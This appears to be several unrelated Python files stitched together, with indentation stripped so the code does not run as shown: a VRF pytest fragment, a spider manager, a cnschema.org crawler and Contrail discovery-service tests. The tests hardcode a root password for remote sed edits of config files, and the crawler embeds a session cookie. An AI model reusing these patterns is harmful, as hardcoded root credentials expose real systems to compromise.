src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
def test_vrf2_neigh(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf2_neigh.txt"],
src_ports= g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000']
)
def test_vrf2_fib(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf2_fib.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000']
)
@pytest.mark.usefixtures('setup_vrf_restore')
def test_vrf1_neigh_after_restore(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf1_neigh.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
@pytest.mark.usefixtures('setup_vrf_restore')
def test_vrf1_fib_after_restore(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf1_fib.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
|
all.py
|
# -*- coding: utf-8 -*-
'''
@Date: 2020/1/8
@Author: fanyibin
@Description: Manage all spiders
'''
from config.config_parser import get_config
from os import popen
from multiprocessing import Process
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--view', help="--view all: view all spiders")
parser.add_argument('--kill', help="--kill all: kill all spiders")
parser.add_argument('--restart', help="--restart all: restart all spiders")
args = parser.parse_args()
class AllManager(object):
env = get_config('settings.ini').get('FRAME_SETTINGS', 'PYTHON_ENV')
names = get_config('spider_config.ini').options('SPIDERS')
arg_command_map = {
'view': '{} manager.py -v {}',
'kill': '{} manager.py -k {}',
'restart': '{} manager.py -rs {}',
}
def __init__(self):
self.arg_inst = self._get_arg_key()
def _get_arg_key(self):
arg_kwargs = args._get_kwargs()
for group in arg_kwargs:
if group[1] == 'all':
arg_inst = group[0]
return arg_inst
def _get_command(self, arg, name):
return self.arg_command_map[arg].format(self.env, name)
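# For illustration (hypothetical values): with env == 'python3' and name == 'news_spider',
# the 'view' action yields the command 'python3 manager.py -v news_spider'.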
def run(self):
_task = [Process(target=self._execute_command, args=(name,)) for name in self.names]
for item_task in _task:
item_task.start()
del _task
return
def _execute_command(self, name):
popen(self._get_command(self.arg_inst, name))
if __name__ == '__main__':
man = AllManager()
man.run()
|
thread_crawler.py
|
import threading
import time
from queue import Queue
import requests
import os
from bs4 import BeautifulSoup
from PreprocessData.database_op import datasql
def run(que, json_load_path):
headers = {
'Cookie': 'OCSSID=4df0bjva6j7ejussu8al3eqo03',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
'(KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',
}
cnt = 0
while que.empty() is not True:
try:
url = que.get()
filename = url[url.rfind('/') + 1:-5]
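# url[url.rfind('/') + 1:-5] strips the directory part and the trailing '.json',
# e.g. 'http://cnschema.org/data/Person.json' -> 'Person' (hypothetical entity name).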
path = '{}/{}.json'.format(json_load_path, filename)
if os.path.exists(path) is True:
print("%s 已经存在。" % (filename))
continue
res = requests.get(url, headers=headers)
soup = BeautifulSoup(res.content, "html.parser", from_encoding='gb18030')
with open(path, 'w', encoding='utf-8') as f:
f.write(soup.text)
f.close()
time.sleep(1)
cnt = cnt + 1
print("完成第 %s 个" % (cnt))
except Exception as e:
print(e)
def prepare(dest, result):
queue = Queue()
json_load_path = r'../all_{}_json'.format(dest)
for obj in result:
# print('http://cnschema.org/data/' + obj[0] + '.json')
queue.put('http://cnschema.org/data/' + obj[0] + '.json')
threads = []
for i in range(1, 6):  # spawn 5 worker threads that share the URL queue
    t = threading.Thread(target=run, args=(queue, json_load_path))
    t.start()
    threads.append(t)
# join only after every worker has been started, so the downloads actually run in parallel
for t in threads:
    t.join()
if __name__ == '__main__':
dest = 'property'  # whether to crawl entities or properties
msql = datasql()
result = msql.query('{}_tab'.format(dest))
prepare(dest, result)
# filter_pro(json_load_path)  # some of the crawled JSON files are malformed and need to be fixed up
|
test_discovery_serial.py
|
import unittest
import fixtures
import testtools
import traceback
from tcutils.wrappers import preposttest_wrapper
import uuid
import base
import test
import time
from time import sleep
import threading
from tcutils.config.discovery_util import DiscoveryServerUtils
from tcutils.contrail_status_check import ContrailStatusChecker
from multiprocessing import Process
class TestDiscoverySerial(base.BaseDiscoveryTest):
@classmethod
def setUpClass(cls):
super(TestDiscoverySerial, cls).setUpClass()
def runTest(self):
pass
# end runTest
@test.attr(type=['sanity', 'vcenter'])
@preposttest_wrapper
def test_control_node_restart_and_validate_status_of_the_service(self):
''' Validate restart of control node services
'''
result = True
svc_lst = []
svc_lst = self.ds_obj.get_all_control_services(self.inputs.cfgm_ip)
for elem in list(svc_lst):  # iterate over a copy; down services are removed from svc_lst below
if (self.ds_obj.get_service_status(self.inputs.cfgm_ip, service_tuple=elem) == 'up'):
self.logger.info("Service %s is up" % (elem,))
result = result and True
else:
self.logger.warn("Service %s is down" % (elem,))
result = result and False
svc_lst.remove(elem)
# Stopping the control node service
for elem in svc_lst:
ip = elem[0]
self.logger.info("Stopping service %s.." % (elem,))
self.inputs.stop_service('contrail-control', [ip])
time.sleep(20)
for elem in svc_lst:
ip = elem[0]
if (self.ds_obj.get_service_status(self.inputs.cfgm_ip, service_tuple=elem) == 'up'):
self.logger.warn("Service %s is still up" % (elem,))
result = result and False
else:
self.logger.info("Service %s is down" % (elem,))
result = result and True
# Starting the control node service
for elem in svc_lst:
ip = elem[0]
self.logger.info("Starting service %s.." % (elem,))
self.inputs.start_service('contrail-control', [ip])
retry = 0
for elem in svc_lst:
ip = elem[0]
while True:
svc_status = self.ds_obj.get_service_status(self.inputs.cfgm_ip, service_tuple=elem)
if svc_status == 'up':
self.logger.info(
"Service %s came up after service was started" % (elem,))
result = result and True
break
else:
retry = retry + 1
time.sleep(1)
self.logger.warn("Service %s isn't up yet " % (elem,))
if retry > 30:
self.logger.info(
"Service %s is down even after service was started" % (elem,))
result = result and False
break
assert result
return True
@preposttest_wrapper
def test_scale_test(self):
''' Publish 100 services, subscribe to them and then delete them
'''
try:
service = 'dummy_service'
port = 658093
base_ip = '192.168.1.'
result = True
# Changing the hc_max_miss=3000 and verifying that the services are
# down after 25 mins
cmd = 'cd /etc/contrail;sed -i \'/hc_max_miss/c\hc_max_miss = 3000\' contrail-discovery.conf'
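# sed's '/pattern/c\text' command replaces each line matching the pattern with the given text,
# so e.g. an existing 'hc_max_miss = 3' line becomes 'hc_max_miss = 3000' here.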
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
cmd = 'cd /etc/contrail;sed -i \'/ttl_short/c\\ttl_short = 2\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
cmd = 'cd /etc/contrail;cat contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
out_put = self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
self.logger.info("%s" % (out_put))
self.inputs.restart_service('contrail-discovery', [ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
time.sleep(10)
# Bringing up services
self.logger.info("Bringing up services...")
threads = []
published_service_lst = []
for x in range(1, 101):
svc_ip = base_ip + str(x)
svc = 'svc' + str(x)
# self.logger.info("Publishing service with ip %s and port %s"%(svc_ip,port))
t = threading.Thread(target=self.ds_obj.publish_service_to_discovery, args=(
self.inputs.cfgm_ip, service, svc_ip, port))
threads.append(t)
for th in threads:
self.logger.info("Publishing service with ip %s and port %s" %
(svc_ip, port))
th.start()
for th in threads:
th.join()
# svc = self.ds_obj.publish_service_to_discovery(service=service,ip=svc_ip,port=port)
time.sleep(5)
self.logger.info("Verifying all services are up...")
svc = self.ds_obj.get_all_services_by_service_name(
self.inputs.cfgm_ip, service=service)
for elem in svc:
ip = elem['info']['ip-address']
elem = (ip, elem['service_type'])
self.logger.info("ip: %s" % (ip))
if (ip in (base_ip + str(x) for x in range(1, 101))):
self.logger.info("%s is added to discovery service" %
(elem,))
result = result and True
self.logger.info("Verifying if the service is up")
svc_status = self.ds_obj.get_service_status(
self.inputs.cfgm_ip, service_tuple=elem)
if (svc_status == 'up'):
self.logger.info("svc is up")
result = result and True
else:
result = result and False
self.logger.warn("svc not up")
else:
self.logger.warn("%s is NOT added to discovery service" %
(elem,))
result = result and False
# Verify instances == 0 will send all services
cuuid = uuid.uuid4()
resp = self.ds_obj.subscribe_service_from_discovery(
self.inputs.cfgm_ip, service=service, instances=0, client_id=str(cuuid))
resp = resp[service]
if len(resp) < 100:
result = result and False
self.logger.warn("Not all services returned")
self.logger.info(
"Sending 100 subscription message to discovery..")
subs_threads = []
for i in range(100):
cuuid = uuid.uuid4()
t = threading.Thread(target=self.ds_obj.subscribe_service_from_discovery, args=(
self.inputs.cfgm_ip, service, 2, str(cuuid)))
subs_threads.append(t)
for th in subs_threads:
th.start()
time.sleep(3)
for th in subs_threads:
th.join()
# assert result
except Exception as e:
print(e)
finally:
# Changing contrail-discovery.conf back to the defaults
cmd = 'cd /etc/contrail;sed -i \'/hc_max_miss/c\hc_max_miss = 3\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
cmd = 'cd /etc/contrail;sed -i \'/ttl_short/c\\ttl_short = 1\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
cmd = 'cd /etc/contrail;cat contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
out_put = self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
self.logger.info("%s" % (out_put))
self.inputs.restart_service('contrail-discovery', [ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
time.sleep(10)
resp = None
resp = self.ds_obj.cleanup_service_from_discovery(
self.inputs.cfgm_ip)
assert result
return True
# End test test_scale_test
@preposttest_wrapper
def test_send_admin_state_in_publish(self):
''' 1) Publish services with admin state down
2) Subscribe clients, and verify that discovery server should not allocate down services
3) Update admin state of published services from down to up
4) Subscribe clients, and verify that discovery server should allocate the services
5) Cleanup
'''
try:
service = 'my_svc_admin_state'
port = 65093
base_ip = '192.168.10.'
no_of_services = 25
result = True
msg = ''
self.ds_obj.modify_discovery_conf_file_params(operation='change_ttl_short_and_hc_max_miss')
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
self.publish_service_with_admin_state(service, base_ip, port, 'down', no_of_services)
if not self.verify_service_status(service, base_ip, no_of_services, expected_status='down'):
result = result and False
# Verify instances == 0 will send all services
cuuid = uuid.uuid4()
resp = self.ds_obj.subscribe_service_from_discovery(
self.inputs.cfgm_ip, service=service, instances=0, client_id=str(cuuid))
resp = resp[service]
if len(resp) == 0 :
result = result and True
self.logger.info("Down services are not returned by the discovery server")
else:
result = result and False
self.logger.error("Discovery server returning down services for the client's subscription")
self.logger.info(
"Sending 30 subscription message to discovery for the down services \
and verify if any of them is returned..")
for i in range(30):
cuuid = uuid.uuid4()
resp = self.ds_obj.subscribe_service_from_discovery(self.inputs.cfgm_ip, service, 0, str(cuuid))
time.sleep(1)
resp = resp[service]
if resp:
self.logger.error("Down service is returned by the discovery server")
result = result and False
# change the admin state from down to up and verify if discovery started returning services
published_service_lst = []
for x in range(1, no_of_services + 1):
svc_ip = base_ip + str(x)
svc = 'svc' + str(x)
self.ds_obj.update_service(self.inputs.cfgm_ip, service, svc_ip, admin_state='up')
time.sleep(5)
if not self.verify_service_status(service, base_ip, no_of_services, expected_status='up'):
result = result and False
# Verify instances == 0 will send all services
cuuid = uuid.uuid4()
resp = self.ds_obj.subscribe_service_from_discovery(
self.inputs.cfgm_ip, service=service, instances=0, client_id=str(cuuid))
resp = resp[service]
if len(resp) < no_of_services:
result = result and False
self.logger.error("Not all services returned")
self.logger.info(
"Sending 30 subscription message to discovery..")
subs_threads = []
for i in range(30):
cuuid = uuid.uuid4()
t = threading.Thread(target=self.ds_obj.subscribe_service_from_discovery, args=(
self.inputs.cfgm_ip, service, 2, str(cuuid)))
subs_threads.append(t)
for th in subs_threads:
th.start()
time.sleep(3)
for th in subs_threads:
th.join()
except Exception as e:
self.logger.exception("Got exception %s"%(e))
raise
finally:
self.ds_obj.modify_discovery_conf_file_params(operation='change_ttl_short_and_hc_max_miss',\
ttl_short=1, hc_max_miss=3)
self.logger.info("%s"%(msg))
resp = self.ds_obj.cleanup_service_from_discovery(
self.inputs.cfgm_ip)
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
resp = None
assert result
return True
# End test test_send_admin_state_in_publish
@preposttest_wrapper
def test_publish(self):
''' Validate short ttl
'''
self.logger.info(
"********TEST WILL FAIL IF RAN MORE THAN ONCE WITHOUT CLEARING THE ZOOKEEPER DATABASE*********")
service = 'dummy_service23'
port = 65093
result = True
try:
# Changing the hc_max_miss=3000 and verifying that the services are
# down after 25 mins
cmd = 'cd /etc/contrail;sed -i \'/hc_max_miss/c\hc_max_miss = 3000\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
cmd = 'cd /etc/contrail;sed -i \'/ttl_short/c\\ttl_short = 2\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
cmd = 'cd /etc/contrail;cat contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
out_put = self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
self.logger.info("%s" % (out_put))
self.inputs.restart_service('contrail-discovery', [ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
time.sleep(10)
base_ip = '192.168.1.'
expected_ttl = 2
cuuid = uuid.uuid4()
while(expected_ttl <= 32):
resp = None
resp = self.ds_obj.subscribe_service_from_discovery(
self.inputs.cfgm_ip, service=service, instances=1, client_id=str(cuuid))
ttl = resp['ttl']
self.logger.info("ttl : %s" % (ttl))
if (ttl <= expected_ttl):
result = result and True
else:
result = result and False
self.logger.info("Waiting for %s sec..." % (expected_ttl))
time.sleep(expected_ttl)
expected_ttl = expected_ttl * 2
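# expected_ttl doubles each pass (2, 4, 8, 16, 32) and the loop exits once it reaches 64,
# matching the short-TTL back-off handed out while no publisher for the service is available.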
self.logger.info("Verifying that the ttl sablizes at 32 sec..")
resp = None
resp = self.ds_obj.subscribe_service_from_discovery(
self.inputs.cfgm_ip, service=service, instances=1, client_id=str(cuuid))
ttl = resp['ttl']
self.logger.info("ttl : %s" % (ttl))
if (ttl <= 32):
result = result and True
else:
result = result and False
# Bringing up services
self.logger.info("Bringing up services...")
for x in range(1, 4):
svc_ip = base_ip + str(x)
svc = 'svc' + str(x)
self.logger.info("Publishing service with ip %s and port %s" %
(svc_ip, port))
svc = self.ds_obj.publish_service_to_discovery(
self.inputs.cfgm_ip, service=service, ip=svc_ip, port=port)
time.sleep(5)
self.logger.info("Verifying that the nornal ttl sent..")
resp = None
resp = self.ds_obj.subscribe_service_from_discovery(
self.inputs.cfgm_ip, service=service, instances=1, client_id=str(cuuid))
ttl = resp['ttl']
self.logger.info("ttl : %s" % (ttl))
if (ttl in range(300, 1800)):
result = result and True
else:
result = result and False
# Verify instances == 0 will send all services
cuuid = uuid.uuid4()
resp = self.ds_obj.subscribe_service_from_discovery(
self.inputs.cfgm_ip, service=service, instances=0, client_id=str(cuuid))
resp = resp[service]
if len(resp) < 3:
result = result and False
self.logger.warn("Not all services returned")
expected_ip_list = ['192.168.1.1', '192.168.1.2', '192.168.1.3']
result1 = True
for elem in resp:
self.logger.info("%s" % (elem))
if (elem['ip-address'] in expected_ip_list and elem['port'] == port):
result1 = result1 and True
expected_ip_list.remove(elem['ip-address'])
else:
self.logger.info('inside else')
result1 = result1 and False
if result1:
self.logger.info(
"All services correctly received by subscriber")
result = result and result1
else:
self.logger.warn("All services not received by subscriber")
result = result and result1
self.logger.warn("Missing service as %s" % (expected_ip_list))
except Exception as e:
print(e)
finally:
cmd = 'cd /etc/contrail;sed -i \'/hc_max_miss/c\hc_max_miss = 3\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
cmd = 'cd /etc/contrail;sed -i \'/ttl_short/c\\ttl_short = 1\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
cmd = 'cd /etc/contrail;cat contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
out_put = self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
self.logger.info("%s" % (out_put))
self.inputs.restart_service('contrail-discovery', [ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
time.sleep(40)
resp = None
resp = self.ds_obj.cleanup_service_from_discovery(
self.inputs.cfgm_ip)
assert result
return True
@preposttest_wrapper
def test_change_parameters_in_contrail_discovery_conf(self):
''' Validate parameters in discovery.conf
-ttl_min
-ttl_max
-hc_max_miss
-policy
'''
# Changing hc_max_miss to 10 and verifying that the services are reported
# down only after the longer miss interval
try:
cmd = 'cd /etc/contrail;sed -i \'/hc_max_miss.*=.*/c\hc_max_miss = 10\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
self.inputs.restart_service('contrail-discovery', [ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
result = True
svc_lst = []
svc_lst = self.ds_obj.get_all_control_services(self.inputs.cfgm_ip)
for elem in list(svc_lst):  # iterate over a copy; down services are removed from svc_lst below
if (self.ds_obj.get_service_status(self.inputs.cfgm_ip, service_tuple=elem) == 'up'):
self.logger.info("Service %s is up" % (elem,))
result = result and True
else:
self.logger.warn("Service %s is down" % (elem,))
result = result and False
svc_lst.remove(elem)
# Stopping the control node service
for elem in svc_lst:
ip = elem[0]
self.logger.info("Stopping service %s.." % (elem,))
self.inputs.stop_service('contrail-control', [ip])
time.sleep(15)
for elem in svc_lst:
ip = elem[0]
if (self.ds_obj.get_service_status(self.inputs.cfgm_ip, service_tuple=elem) == 'up'):
self.logger.info("Service %s is still up" % (elem,))
result = result and True
else:
self.logger.warn("Service %s is down before 25 sec" %
(elem,))
result = result and False
time.sleep(45)
for elem in svc_lst:
ip = elem[0]
if (self.ds_obj.get_service_status(self.inputs.cfgm_ip, service_tuple=elem) == 'up'):
self.logger.warn("Service %s is still up after 30 secs" %
(elem,))
result = result and False
else:
self.logger.info("Service %s is down after 30 sec" %
(elem,))
result = result and True
# Starting the control node service
for elem in svc_lst:
ip = elem[0]
self.logger.info("Starting service %s.." % (elem,))
self.inputs.start_service('contrail-control', [ip])
time.sleep(6)
except Exception as e:
print(e)
finally:
# Changing the hc_max_miss=3
cmd = 'cd /etc/contrail;sed -i \'/hc_max_miss.*=.*/c\hc_max_miss = 3\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
self.inputs.restart_service('contrail-discovery', [ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
time.sleep(10)
assert result
# Change policy and verify discovery functionality: policy =
# [load-balance | round-robin | fixed]
self.logger.info("Changing the discovery policy to round-robin")
cmd = 'cd /etc/contrail;echo \'policy = round-robin \'>> contrail-discovery.conf'
self.inputs.run_cmd_on_server(
self.inputs.cfgm_ip, cmd, username='root', password='c0ntrail123')
self.inputs.restart_service(
'contrail-discovery', [self.inputs.cfgm_ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
assert self.ds_obj.verify_bgp_connection()
self.logger.info("Changing the discovery policy to fixed")
cmd = 'cd /etc/contrail;sed -i \'/policy = round-robin/c\policy = fixed\' contrail-discovery.conf'
self.inputs.run_cmd_on_server(
self.inputs.cfgm_ip, cmd, username='root', password='c0ntrail123')
self.inputs.restart_service(
'contrail-discovery', [self.inputs.cfgm_ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
assert self.ds_obj.verify_bgp_connection()
self.logger.info("Reverting back policy to default")
cmd = 'cd /etc/contrail;sed -i \'/policy = fixed/c\ \' contrail-discovery.conf'
self.inputs.run_cmd_on_server(
self.inputs.cfgm_ip, cmd, username='root', password='c0ntrail123')
self.inputs.restart_service(
'contrail-discovery', [self.inputs.cfgm_ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
assert self.ds_obj.verify_bgp_connection()
return True
@preposttest_wrapper
def test_rule_for_vrouter_with_xmpp_server(self):
''' Validate that applied rules take effect correctly for
contrail-vrouter-agent and its subscription to XMPP Server.
Steps:
1. Create rules for all contrail-vrouter-agent of 1 network
to subscribe to XMPP Servers of same network.
2. Verify if rule is working as expected or not
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of XMPP servers running in different subnets
Also, setup requirement of this test case is to have at
least 2 publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("xmpp-server", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,\
"change_min_max_ttl")
if len(self.inputs.bgp_control_ips) > 0:
self.logger.info("Creating rules corresponding to control node *xmpp-server*")
self.logger.info(" Subscribers are *vrouter agent* running in same subnets")
for i in range(0,len(self.inputs.bgp_control_ips)):
bgp_control_ip = self.inputs.bgp_control_ips[i].split('.')
bgp_control_ip[3] = '0'
bgp_control_ip = ".".join(bgp_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule(bgp_control_ip,'xmpp-server',\
bgp_control_ip, 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
self.logger.info("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
self.logger.debug("#### Verifying clients subscribed to publishers ###")
try:
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0', \
self.inputs.compute_control_ips[i], 'xmpp-server')
if verification == False:
result = False
except Exception as e:
self.logger.error(e)
result = False
for i in range(0,len(self.inputs.bgp_control_ips)):
bgp_control_ip = self.inputs.bgp_control_ips[i].split('.')
bgp_control_ip[3] = '0'
bgp_control_ip = ".".join(bgp_control_ip) + "/24"
rule_status = self.ds_obj.delete_and_verify_rule( bgp_control_ip,\
'xmpp-server', bgp_control_ip,'contrail-vrouter-agent:0')
if rule_status == False:
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_for_vrouter_with_dns_server(self):
''' Validate that applied rules take effect correctly for
contrail-vrouter-agent and its subscription to DNS Server.
Steps:
1. Create rules for all contrail-vrouter-agent of 1 network to
subscribe to DNS Servers of same network.
2. Verify if rule is working as expected or not
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of DNS servers running in different subnets
Also, setup requirement of this test case is to have at least
2 publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("dns-server", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
if len(self.inputs.bgp_control_ips) > 0:
self.logger.info("Creating rules corresponding to control node *DNS-Server*")
self.logger.info(" Subscribers are *vrouter agent* running in same subnets")
for i in range(0,len(self.inputs.bgp_control_ips)):
bgp_control_ip = self.inputs.bgp_control_ips[i].split('.')
bgp_control_ip[3] = '0'
bgp_control_ip = ".".join(bgp_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule( bgp_control_ip,\
'dns-server',bgp_control_ip, 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
self.logger.info("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
self.logger.debug("#### Verifying clients subscribed to publishers ###")
try:
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0', \
self.inputs.compute_control_ips[i], 'dns-server')
if verification == False:
result = False
except Exception as e:
self.logger.error(e)
result = False
for i in range(0,len(self.inputs.bgp_control_ips)):
bgp_control_ip = self.inputs.bgp_control_ips[i].split('.')
bgp_control_ip[3] = '0'
bgp_control_ip = ".".join(bgp_control_ip) + "/24"
rule_status = self.ds_obj.delete_and_verify_rule( bgp_control_ip,\
'dns-server', bgp_control_ip,'contrail-vrouter-agent:0')
if rule_status == False:
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_for_control_with_ifmap_server(self):
''' Validate that applied rules take effect correctly for
"contrail-control" and its subscription to IfmapServer.
Steps:
1. Create rules for all contrail-control of 1 network to subscribe
to Ifmap Servers of same network.
2. Verify if rule is working as expected or not
Precondition: Assumption is that setup is having a contrail-control
connected to 2 instances of Ifmap servers running in different subnets
Also, setup requirement of this test case is to have at least 2
publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("IfmapServer", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-control')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
if len(self.inputs.cfgm_control_ips) > 0:
self.logger.info("Creating rules corresponding to config node *IfmapServer*")
self.logger.info(" Subscribers are *contrail-control* running in same subnets")
for i in range(0,len(self.inputs.cfgm_control_ips)):
cfgm_control_ip = self.inputs.cfgm_control_ips[i].split('.')
cfgm_control_ip[3] = '0'
cfgm_control_ip = ".".join(cfgm_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule( cfgm_control_ip,\
'IfmapServer', cfgm_control_ip, 'contrail-control')
if rule_status == False:
result = False
self.logger.info("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
self.logger.debug("#### Verifying clients subscribed to publishers ###")
try:
for i in range(0,len(self.inputs.bgp_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-control', self.inputs.bgp_control_ips[i],\
'IfmapServer')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
except Exception as e:
self.logger.error(e)
result = False
for i in range(0,len(self.inputs.cfgm_control_ips)):
cfgm_control_ip = self.inputs.cfgm_control_ips[i].split('.')
cfgm_control_ip[3] = '0'
cfgm_control_ip = ".".join(cfgm_control_ip) + "/24"
rule_status = self.ds_obj.delete_and_verify_rule( cfgm_control_ip,\
'IfmapServer', cfgm_control_ip, 'contrail-control')
if rule_status == False:
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_for_webui_with_op_server(self):
''' Validate that applied rules take effect correctly for
"contrailWebUI" and its subscription to Op Server.
Steps:
1. Create rules for all contrailWebUI of 1 network to
subscribe to Op Servers of same network.
2. Verify if rule is working as expected or not
Precondition: Assumption is that setup is having ContrailWebUI
connected to OP server running in different subnet.
'''
self.ds_obj.skip_discovery_test("OpServer", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'supervisor-webui')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
if len(self.inputs.collector_control_ips) > 0:
self.logger.info("Creating rules corresponding to collector node *OpServer*")
self.logger.info(" Subscribers are *contrailWebUI* running in same subnets")
for i in range(0,len(self.inputs.collector_control_ips)):
collector_control_ip = self.inputs.collector_control_ips[i].split('.')
collector_control_ip[3] = '0'
collector_control_ip = ".".join(collector_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule(collector_control_ip,\
'OpServer', collector_control_ip,'contrailWebUI')
if rule_status == False:
result = False
self.logger.info("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
self.logger.debug("#### Verifying clients subscribed to publishers ###")
try:
for i in range(0,len(self.inputs.webui_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrailWebUI', self.inputs.webui_control_ips[i], 'OpServer')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
except Exception as e:
self.logger.error(e)
result = False
for i in range(0,len(self.inputs.collector_control_ips)):
collector_control_ip = self.inputs.collector_control_ips[i].split('.')
collector_control_ip[3] = '0'
collector_control_ip = ".".join(collector_control_ip) + "/24"
